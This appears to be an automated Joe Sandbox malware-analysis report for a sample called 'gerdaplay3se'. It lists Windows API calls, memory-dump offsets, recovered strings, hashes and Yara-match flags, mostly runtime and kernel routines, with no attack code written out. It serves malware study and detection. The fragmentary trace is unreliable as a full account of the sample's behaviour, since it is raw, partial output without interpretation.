                                                                                  • Instruction ID: a052efc5f8264b04540ba139265ff63877c4dc4e75c0ae38b6650f7b3518fcca
                                                                                  • Opcode Fuzzy Hash: d09c44be7b725e9416f1bbabc7ff939c5033ef1a694eb4ed66286c613d9d8241
                                                                                  • Instruction Fuzzy Hash: 7A31F0B24042217EDB303F785C8883B7E9CE64574A7120D3BF542E3390E67A8E814AAD
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D63428
                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02D6346B
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D63472
                                                                                  • GetLastError.KERNEL32 ref: 02D63486
                                                                                  • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02D634D7
                                                                                  • RtlEnterCriticalSection.NTDLL(00000018), ref: 02D634ED
                                                                                  • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02D63518
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                  • String ID: CancelIoEx$KERNEL32
                                                                                  • API String ID: 2902213904-434325024
                                                                                  • Opcode ID: 00bb6c5cff57b148d1b65047cbb242b5d51609fa5c815f180ca05da37bb91a16
                                                                                  • Instruction ID: 9d4e30c9ecf191ed8e96df83c2f81f30f713bee13233d71a9ef711a18b9b6b45
                                                                                  • Opcode Fuzzy Hash: 00bb6c5cff57b148d1b65047cbb242b5d51609fa5c815f180ca05da37bb91a16
                                                                                  • Instruction Fuzzy Hash: BA317C75904205DFDB01AF68D888AAABBF9FF49711F2084A9E8159B380D774DD10CBA1
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403D7D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406528,?,00406578,?,?,?,Runtime Error!Program: ), ref: 0040541A
                                                                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405432
                                                                                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405443
                                                                                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00405450
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                  • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$xe@
                                                                                  • API String ID: 2238633743-4073082454
                                                                                  • Opcode ID: c1c5459b902c6d691e26e6f6b3d5bc075fbf46770f4929c54e66e674ea662e67
                                                                                  • Instruction ID: 002c49bf34bfddc632f277928187d9a53126bd14f393e8a72b926efab3457658
                                                                                  • Opcode Fuzzy Hash: c1c5459b902c6d691e26e6f6b3d5bc075fbf46770f4929c54e66e674ea662e67
                                                                                  • Instruction Fuzzy Hash: E1018431740705AFC7109FB4AD80E6B7AE9FB48791309843BB955F22A1D778C860CF69
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403CC6
                                                                                  • GetStdHandle.KERNEL32(000000F4,00406528,00000000,?,00000000,00000000), ref: 00403D9C
                                                                                  • WriteFile.KERNEL32(00000000), ref: 00403DA3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$HandleModuleNameWrite
                                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $r@
                                                                                  • API String ID: 3784150691-1191147370
                                                                                  • Opcode ID: d598713df4d839de7fd74915155ccdeaa4efa499b3dc35e679589c6eb5dc5418
                                                                                  • Instruction ID: 901e413bd7d296cb1b0b97d790854a8d5494ec17f79a926850544caa0371b074
                                                                                  • Opcode Fuzzy Hash: d598713df4d839de7fd74915155ccdeaa4efa499b3dc35e679589c6eb5dc5418
                                                                                  • Instruction Fuzzy Hash: F831C772A04208AEEF20EF60DE49F9A776CEF45304F1004BBF545F61C1D6B8AA858A59
                                                                                  APIs
                                                                                  • LCMapStringW.KERNEL32(00000000,00000100,004065F4,00000001,00000000,00000000,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 00405917
                                                                                  • LCMapStringA.KERNEL32(00000000,00000100,004065F0,00000001,00000000,00000000,?,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405933
                                                                                  • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,004051A5,?,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 0040597C
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 004059B4
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405A0C
                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405A22
                                                                                  • LCMapStringW.KERNEL32(00000000,?,004051A5,00000000,004051A5,?,?,004051A5,00200020,00000000,?,00000000), ref: 00405A55
                                                                                  • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405ABD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$ByteCharMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 352835431-0
                                                                                  • Opcode ID: 6e7e0904aad4ffb7df7fa70090622cd283316a6a4d1fe7c3c07164d91eefa06b
                                                                                  • Instruction ID: ad677ee5f46337090c489763c5b1535e0d4a7e7cc2f37d679e5ddd81b555dfe6
                                                                                  • Opcode Fuzzy Hash: 6e7e0904aad4ffb7df7fa70090622cd283316a6a4d1fe7c3c07164d91eefa06b
                                                                                  • Instruction Fuzzy Hash: 8B516C71A00609EFCF218FA5DD85A9F7FB5FB48750F14422AF911B21A0D3398921DF69
                                                                                  APIs
                                                                                  • OpenEventA.KERNEL32(00100002,00000000,00000000,84A2267A), ref: 02D715F0
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D71605
                                                                                  • ResetEvent.KERNEL32(00000000,84A2267A), ref: 02D7160F
                                                                                  • CloseHandle.KERNEL32(00000000,84A2267A), ref: 02D71644
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,84A2267A), ref: 02D716BA
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D716CF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEventHandle$CreateOpenReset
                                                                                  • String ID:
                                                                                  • API String ID: 1285874450-0
                                                                                  • Opcode ID: 1fe8f5e80edf85325545ae110f860cc844df78e5babf9d1cfe2e05e52391a236
                                                                                  • Instruction ID: 65f296ea53e7cd2d30d0385e74256b9af5827b2baeed8bdef4da4fab04394eef
                                                                                  • Opcode Fuzzy Hash: 1fe8f5e80edf85325545ae110f860cc844df78e5babf9d1cfe2e05e52391a236
                                                                                  • Instruction Fuzzy Hash: E0412C74D04358ABDF20DFA5D844BADBBB8EB05724F244219E819AB380E778DD05CBA1
                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D620AC
                                                                                  • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02D620CD
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D620D8
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 02D6213E
                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02D6217A
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 02D62187
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D621A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                                  • String ID:
                                                                                  • API String ID: 1171374749-0
                                                                                  • Opcode ID: 25c9de8f527684a012988735377b353a61cbf753b2d1727dd7c3e22425543d68
                                                                                  • Instruction ID: b0d5ae161a7c5374615cdcc21ce17a7273f88465de38a61d57ebe751d5e4ebcf
                                                                                  • Opcode Fuzzy Hash: 25c9de8f527684a012988735377b353a61cbf753b2d1727dd7c3e22425543d68
                                                                                  • Instruction Fuzzy Hash: A54148755087019FD321DF25D888A6BBBF9EBC8754F104A1EE89A82350D734E909CFA1
                                                                                  APIs
                                                                                    • Part of subcall function 02D71E10: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02D7166E,?,?), ref: 02D71E3F
                                                                                    • Part of subcall function 02D71E10: CloseHandle.KERNEL32(00000000,?,?,02D7166E,?,?), ref: 02D71E54
                                                                                    • Part of subcall function 02D71E10: SetEvent.KERNEL32(00000000,02D7166E,?,?), ref: 02D71E67
                                                                                  • OpenEventA.KERNEL32(00100002,00000000,00000000,84A2267A), ref: 02D715F0
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D71605
                                                                                  • ResetEvent.KERNEL32(00000000,84A2267A), ref: 02D7160F
                                                                                  • CloseHandle.KERNEL32(00000000,84A2267A), ref: 02D71644
                                                                                  • __CxxThrowException@8.LIBCMT ref: 02D71675
                                                                                    • Part of subcall function 02D7449A: RaiseException.KERNEL32(?,?,02D6FA96,?,?,?,?,?,?,?,02D6FA96,?,02D90F78,?), ref: 02D744EF
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,84A2267A), ref: 02D716BA
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D716CF
                                                                                    • Part of subcall function 02D71B50: GetCurrentProcessId.KERNEL32(?), ref: 02D71BA9
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,84A2267A), ref: 02D716DF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                                  • String ID:
                                                                                  • API String ID: 2227236058-0
                                                                                  • Opcode ID: 1611b8f19c878152bdd8dfba3069ff481d64e669ef60d8e26fe53cd054910034
                                                                                  • Instruction ID: 2032e26d97e86c463b055b5734f3ca99b0af42678e7be10915857987df234887
                                                                                  • Opcode Fuzzy Hash: 1611b8f19c878152bdd8dfba3069ff481d64e669ef60d8e26fe53cd054910034
                                                                                  • Instruction Fuzzy Hash: 85313975D00359ABDF20DBA49C84BADB7B9AF05715F180229E81DEB380F768DD05CB61
                                                                                  APIs
                                                                                  • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403A36), ref: 00404639
                                                                                  • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403A36), ref: 0040465D
                                                                                  • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403A36), ref: 00404677
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403A36), ref: 00404738
                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403A36), ref: 0040474F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual$FreeHeap
                                                                                  • String ID: r@$r@
                                                                                  • API String ID: 714016831-1712950306
                                                                                  • Opcode ID: 6146d640eca2786615fae02a601f05dd2cfcbd8d5d5bc8993479f9a7be96b628
                                                                                  • Instruction ID: 6d2ae56a8b2e66d9b660bb9c1c671dd7469dd609f739855ae4ec176a3c74651c
                                                                                  • Opcode Fuzzy Hash: 6146d640eca2786615fae02a601f05dd2cfcbd8d5d5bc8993479f9a7be96b628
                                                                                  • Instruction Fuzzy Hash: 3531BEB0940702ABD3309F24DD44B66B7A4EB86755F11463BF265BB2D0E7B8A8418B4D
                                                                                  APIs
                                                                                  • __init_pointers.LIBCMT ref: 02D75CD4
                                                                                    • Part of subcall function 02D78442: RtlEncodePointer.NTDLL(00000000), ref: 02D78445
                                                                                    • Part of subcall function 02D78442: __initp_misc_winsig.LIBCMT ref: 02D78460
                                                                                    • Part of subcall function 02D78442: GetModuleHandleW.KERNEL32(kernel32.dll,?,02D91578,00000008,00000003,02D90F5C,?,00000001), ref: 02D791C1
                                                                                    • Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02D791D5
                                                                                    • Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02D791E8
                                                                                    • Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02D791FB
                                                                                    • Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02D7920E
                                                                                    • Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02D79221
                                                                                    • Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02D79234
                                                                                    • Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02D79247
                                                                                    • Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02D7925A
                                                                                    • Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02D7926D
                                                                                    • Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02D79280
                                                                                    • Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02D79293
                                                                                    • Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02D792A6
                                                                                    • Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02D792B9
                                                                                    • Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02D792CC
                                                                                    • Part of subcall function 02D78442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02D792DF
                                                                                  • __mtinitlocks.LIBCMT ref: 02D75CD9
                                                                                  • __mtterm.LIBCMT ref: 02D75CE2
                                                                                    • Part of subcall function 02D75D4A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02D78878
                                                                                    • Part of subcall function 02D75D4A: _free.LIBCMT ref: 02D7887F
                                                                                    • Part of subcall function 02D75D4A: RtlDeleteCriticalSection.NTDLL(02D93978), ref: 02D788A1
                                                                                  • __calloc_crt.LIBCMT ref: 02D75D07
                                                                                  • __initptd.LIBCMT ref: 02D75D29
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D75D30
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                  • String ID:
                                                                                  • API String ID: 3567560977-0
                                                                                  • Opcode ID: baa7e5f02544a737e9bde09911cfc05f7f6adac09ddad9c47f8893b22ecda321
                                                                                  • Instruction ID: 4c697c2faf8bc9372b11a9d13a528d70fa92a2bc79a1fde9a29b035e3f7a394b
                                                                                  • Opcode Fuzzy Hash: baa7e5f02544a737e9bde09911cfc05f7f6adac09ddad9c47f8893b22ecda321
                                                                                  • Instruction Fuzzy Hash: 83F090325583111AE66476B47C4E79A2786EB02734F600A69EC55C93C0FF1D9C5199A3
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02D733B6,00000000), ref: 02D7341E
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D73425
                                                                                  • RtlEncodePointer.NTDLL(00000000), ref: 02D73431
                                                                                  • RtlDecodePointer.NTDLL(00000001), ref: 02D7344E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                  • String ID: RoInitialize$combase.dll
                                                                                  • API String ID: 3489934621-340411864
                                                                                  • Opcode ID: fad2aa27531263ff7a9d65c12299e2845d4c00433efe8f5eb5aafcdff5940dd3
                                                                                  • Instruction ID: 2d528cb2f7d342a69de856bb1121c951d0f2afd1854e3c19f912dcd4a94e5705
                                                                                  • Opcode Fuzzy Hash: fad2aa27531263ff7a9d65c12299e2845d4c00433efe8f5eb5aafcdff5940dd3
                                                                                  • Instruction Fuzzy Hash: 72E0ED74DE0304AAFB305F70EC89F1537A9B700B47F6058A0B00AD1384D7B58C649B50
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02D733F3), ref: 02D734F3
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D734FA
                                                                                  • RtlEncodePointer.NTDLL(00000000), ref: 02D73505
                                                                                  • RtlDecodePointer.NTDLL(02D733F3), ref: 02D73520
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                  • API String ID: 3489934621-2819208100
                                                                                  • Opcode ID: d56081bc98976362771c45546cbfcf732f4b4bac53df9e16e2f5401374a6c740
                                                                                  • Instruction ID: 779b0d2c8c78d915800c00d3282ba45a1b329284b001ec3e3e364bcb9911f9bf
                                                                                  • Opcode Fuzzy Hash: d56081bc98976362771c45546cbfcf732f4b4bac53df9e16e2f5401374a6c740
                                                                                  • Instruction Fuzzy Hash: 04E09A74DE0304ABFB705F60EC49B2577A9F704746F301854F10AE1744E7789D249B54
                                                                                  APIs
                                                                                  • TlsGetValue.KERNEL32(0000002B,84A2267A,?,?,?,?,00000000,02D869F8,000000FF,02D7210A), ref: 02D71EAA
                                                                                  • TlsSetValue.KERNEL32(0000002B,02D7210A,?,?,00000000), ref: 02D71F17
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D71F41
                                                                                  • HeapFree.KERNEL32(00000000), ref: 02D71F44
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: HeapValue$FreeProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1812714009-0
                                                                                  • Opcode ID: 3ecc70eac92de3f203ee17b65865058e0c3134a4f4fe5f0f928b149316923e45
                                                                                  • Instruction ID: 3ee7f0247b59081aa32a8af97d55d435fbf4f00ea14fb6497078d4a2d1051506
                                                                                  • Opcode Fuzzy Hash: 3ecc70eac92de3f203ee17b65865058e0c3134a4f4fe5f0f928b149316923e45
                                                                                  • Instruction Fuzzy Hash: 68516C76A043449FD720DF29C848B26BBE4FB45764F298659F86D97380E778EC04CB91
                                                                                  APIs
                                                                                  • _ValidateScopeTableHandlers.LIBCMT ref: 02D856D0
                                                                                  • __FindPESection.LIBCMT ref: 02D856EA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FindHandlersScopeSectionTableValidate
                                                                                  • String ID:
                                                                                  • API String ID: 876702719-0
                                                                                  • Opcode ID: 9717c332bf5be69b3fdb22679de319e9e6facd1b0b79ead16c7c018f6461393f
                                                                                  • Instruction ID: 5c73616caa62db4241931b82b7a2b2276573b2694c8abfd65b180e22179da5f9
                                                                                  • Opcode Fuzzy Hash: 9717c332bf5be69b3fdb22679de319e9e6facd1b0b79ead16c7c018f6461393f
                                                                                  • Instruction Fuzzy Hash: A3A1A1B5A006158FDB24EF18E980BADB7F5FB45324F968669EC55A7340E731EC00CBA0
                                                                                  APIs
                                                                                  • GetStringTypeW.KERNEL32(00000001,004065F4,00000001,00000000,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B63
                                                                                  • GetStringTypeA.KERNEL32(00000000,00000001,004065F0,00000001,?,?,00000000,00000000,00000001), ref: 00405B7D
                                                                                  • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BB1
                                                                                  • MultiByteToWideChar.KERNEL32(004051A5,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BE9
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405C3F
                                                                                  • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405C51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: StringType$ByteCharMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 3852931651-0
                                                                                  • Opcode ID: d4209c6b3d3c9ca3d0b98124627720af5477d93fa3c81dc5f6dd6a722f71754a
                                                                                  • Instruction ID: b73683cf29d179dc30ac0dacbc12c8afa3e963ef4805c6be7b54428ebd0f8a91
                                                                                  • Opcode Fuzzy Hash: d4209c6b3d3c9ca3d0b98124627720af5477d93fa3c81dc5f6dd6a722f71754a
                                                                                  • Instruction Fuzzy Hash: 1E417B71500609EFDF219F94DD86AAF7F79EB05750F10443AFA12B6290C339A960CBA9
                                                                                  APIs
                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02D61CB1
                                                                                  • CloseHandle.KERNEL32(?), ref: 02D61CBA
                                                                                  • InterlockedExchangeAdd.KERNEL32(02D97244,00000000), ref: 02D61CC6
                                                                                  • TerminateThread.KERNEL32(?,00000000), ref: 02D61CD4
                                                                                  • QueueUserAPC.KERNEL32(02D61E7C,?,00000000), ref: 02D61CE1
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D61CEC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                  • String ID:
                                                                                  • API String ID: 1946104331-0
                                                                                  • Opcode ID: 65ec3160d5313526364041d98ee3c40233452862b0b6fd1c040af7fdfb1be31f
                                                                                  • Instruction ID: de6692df94707c74b9ef535a7a8700ccd88204e34ffc23aecd2ed38fa1a4b2dc
                                                                                  • Opcode Fuzzy Hash: 65ec3160d5313526364041d98ee3c40233452862b0b6fd1c040af7fdfb1be31f
                                                                                  • Instruction Fuzzy Hash: 10F08135960204BFE7104B96EC0DC6BFBBCEB45720B204659F52A82390DB709D10CB20
                                                                                  APIs
                                                                                    • Part of subcall function 02D69A10: __EH_prolog.LIBCMT ref: 02D69A15
                                                                                    • Part of subcall function 02D69A10: _Allocate.LIBCPMT ref: 02D69A6C
                                                                                    • Part of subcall function 02D69A10: _memmove.LIBCMT ref: 02D69AC3
                                                                                  • _memset.LIBCMT ref: 02D70879
                                                                                  • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02D708E2
                                                                                  • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02D708EA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                                  • String ID: Unknown error$invalid string position
                                                                                  • API String ID: 1854462395-1837348584
                                                                                  • Opcode ID: 5127ce64431425e9942b75dbf9714a7f54800c80e0a73c1450eee7972534828d
                                                                                  • Instruction ID: de44a619ce2eb4dc063b359da01bf62b27f3f03ebf2291d03683741cc2fa8009
                                                                                  • Opcode Fuzzy Hash: 5127ce64431425e9942b75dbf9714a7f54800c80e0a73c1450eee7972534828d
                                                                                  • Instruction Fuzzy Hash: 0051BC702083419FE714DF24C890B2FBBE4EB98748F54092EF48297791E775E948CBA2
                                                                                  APIs
                                                                                  • GetVersionExA.KERNEL32 ref: 004038C7
                                                                                  • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004038FC
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040395C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                  • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                  • API String ID: 1385375860-4131005785
